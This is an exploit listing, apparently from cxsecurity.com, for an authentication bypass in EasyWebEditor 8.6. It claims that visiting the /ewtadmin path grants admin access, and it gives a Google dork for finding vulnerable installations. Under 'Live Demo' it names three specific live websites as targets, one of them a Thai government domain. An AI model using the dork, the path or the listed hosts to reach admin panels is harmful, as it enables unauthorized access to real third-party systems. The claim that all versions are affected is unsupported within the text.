EasyWebEditor 8.6 Authentication Bypass

Published
Credit
Risk
2017.06.16
Sh4dow
Medium
CWE
CVE
Local
Remote
N/A
N/A
No
Yes
Dork: inurl:ewt_news.php?nid=

# Exploit Title: EasyWebEditor 8.6 - Authentication Bypass
# Google Dork: inurl:ewt_news.php?nid=
# Date: 2017-06-16
# Exploit Author: Mersad Security Research
# Software Link: -
# Version: All Version
# Tested on: Kali Liunx
--------------------------------------
Exploit:/ewtadmin

http://127.0.0.1/ewtadmin
-------------------------------------
Live Demo:
http://203.150.225.0/ewtadmin/
http://www.ilovethaiculture.com/ewtadmin/
http://www.dmr.go.th/ewtadmin/
-------------------------------------
# Discovered By: Sh4dow (BlackPentester@Gmail.Com)
# We Are:Mersad (Mersad - Gray Industry)
# https://telegram.me/MersadGroup
# Mersad@Protonmail.Com


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com